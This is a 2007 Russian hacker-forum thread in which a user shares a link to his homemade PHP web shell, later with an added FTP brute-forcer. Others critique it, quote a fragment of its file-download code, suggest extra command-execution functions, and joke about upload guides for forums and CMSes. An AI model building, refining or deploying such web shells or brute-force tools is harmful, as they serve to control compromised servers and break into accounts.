PDA

Просмотр полной версии : шелл от меня=)


GreenBear
11.04.2007, 18:33
в общем тут традиция делать шеллы , а я так посмотрел ни разу не сделал =\
естественно онли пост
http://netsec.ru/gb_old/src/shell.phps

x-treem
11.04.2007, 19:18
похож на шелл ак74
а по делу...
что за тёмносерый текст на светлосером фоне???
пощади глаза

blackybr
11.04.2007, 20:54
В окне листинга неплохо бы сделать выравнивание по колонкам вывода .. сейчас просмотр листинга немного затруднен )
алиасы... мм.. да в принципе не вижу смысла искать конфиг.инк.пхп ))) + ты еще и по маске конфиги ищещь..

GreenBear
11.04.2007, 20:56
ну вообще то я не ищу
просто добавил из р57 =\
как и шелами я тоже не пользуюсь)
про цвета букв - имхо нормально видно

Goudini
11.04.2007, 21:05
фигово в сейфмоде работает, и в винде вообще
Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode

Isis
11.04.2007, 22:20
Так если safe-mode, то max_execution_time(0);

nc.STRIEM
11.04.2007, 22:20
молодец! все просто и ясно, без наворотов)

ps напиши еще подробный манул по его заливке)))

n1†R0x
11.04.2007, 22:48
молодец! все просто и ясно, без наворотов)

ps напиши еще подробный манул по его заливке)))
норм) поюзаем..

да-да, по заливке для каждого форума/цмс, а то че с ним делать :confused: :p

GreenBear
12.04.2007, 00:09
Обновил.)

x-treem
12.04.2007, 08:09
Обновил.)


Так получше будет.

Isis
12.04.2007, 08:20
GreenBear, если сейф мод включен, то будет не корректно пахать
Напиши еще так max_execution_time(0);

hidden
13.04.2007, 12:04
Первое с чем я столкнулся, то что шелл у тебя в UTF-8, а сервер netsec'a отвечает:Content-Type: text/html; charset=windows-1251
if($_POST['download']){
header('Content-Length:'.filesize('/tmp/'.$_POST['download'].'.sql').' ');
header('Content-Type: application/octet-stream');
header("Content-Disposition: attachment; filename={$_POST['download']}.sql");
readfile('/tmp/'.$_POST['download'].'.sql');
die();
}
$_POST['dir'] ? $dir = $_POST['dir'] : $dir = getcwd();
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);Как насчёт убрать слэши из переменных до использования последних?

хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu

ИМХО, яркий действительно глаза напрягает.

Про js, который не нужен я ничего говорить не буду.))

Кстати, не пробовал его проинклудить не первым? Как выглядит?

А вот вопрос, уже давно меня интересует:
Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?

GreenBear
13.04.2007, 20:00
Как насчёт убрать слэши из переменных до использования последних?
ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )
хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu
если чесно то тоже не вижу смысла.
Про js, который не нужен я ничего говорить не буду.))
мне так удобнее делать =\
Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?
автоматом.

hidden
13.04.2007, 22:23
ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )Нет, чтоб не получались вот такие пути "C:\\\\\\\\www\\\\\\\\http\\\\\\\\"

если чесно то тоже не вижу смысла.Просто некоторые функции бывают отключены, а про другие забывают.

GreenBear
13.04.2007, 22:40
ну где выключен попен, там и все другие типа систем, ексек тоже =\ в основном. добавить не сложно конечно, но смысла не вижу)

GreenBear
22.04.2007, 19:17
Обновление.
Добавлен фтп брут
качать (http://gb.netsec.ru/src/shell.phps) там же

Boccob
24.05.2007, 12:50
ОШИБКА
Запрошенный Url не может быть доставлен

Это только у меня так?

-=lebed=-
24.05.2007, 13:00
ОШИБКА
Запрошенный Url не может быть доставлен

Это только у меня так?
нет, сайт не доступен Гринбира...

GreenBear
24.05.2007, 23:32
http://netsec.ru/gb_old/src/shell.phps

ultimatum
24.05.2007, 23:52
спасибо молодец, пользуюсь ак57, но твой тоже придёться затестить )))

+

меня почему-то постоянно куда ненажимаю бросает на страничку с логином и пассом .Набираю test и всё ровно.
Тест провожу на винде
И на хосте под линухой такая же ботва.Хост на агаве

GreenBear
25.05.2007, 10:23
cними авторизацию

ultimatum
25.05.2007, 11:36
// username, password, auth
// $info['username'] = 'test';
// $info['password'] = 'test';
// $info['auth'] = true;

я просто закоментировал , но теперь он просто ничего не делает

GreenBear
25.05.2007, 11:39
закоментируй error_reporting(0);
и посмотри чего пишет ..
я хз чего у тебя там не работает.

ultimatum
25.05.2007, 11:45
Warning: session_start() [function.session-start]: Cannot
send session cookie - headers already sent by (output
started at C:\AppServ\www\she.php:1) in
C:\AppServ\www\she.php on line 16

Warning: session_start() [function.session-start]: Cannot
send session cache limiter - headers already sent (output
started at C:\AppServ\www\she.php:1) in
C:\AppServ\www\she.php on line 16



-----------------------------------------------

вот инфа по машине
Server info:
OS: , Software: Apache/2.2.2 (Win32) PHP/5.1.4
PHP Version: 5.1.4, Safe mode: Off
Disabled Functions: false
MySQL: On, MSSQL: Off, Oracle: Off


-------------------------------

16 строчка


session_start();

GreenBear
25.05.2007, 13:03
пробелов перед <?php
не стоит?

он кстате под виднус не предназначен )

ultimatum
25.05.2007, 13:16
пробелов перед <?php
не стоит?

А причем здесь пробел, если бы php код не рабортал на машине, то сорц бы лез на ружу.
Раз он предназначен под никсы, значит буду тэстить под никсы.А под винду буду другой шел использовать.
Всё ровно ГринБир молодец,спасибо.

GreenBear
25.05.2007, 13:35
хидеры не могу быть посланы после вывода кода страницы.

Helios
25.05.2007, 13:58
2ultimatum

У многих редакторов при сохранении в юникоде есть манера впихивать в начало файла три злочастных байта, которые могут подпортить жизнь программисту.

А причем здесь пробел, если бы php код не рабортал на машине, то сорц бы лез на ружу.
Подучи спецификации HTTP, тогда поймешь, почему, выдав хоть один байт в теле ответа, апач больге не может добавить ни один хидер, в данном случае set-cookie.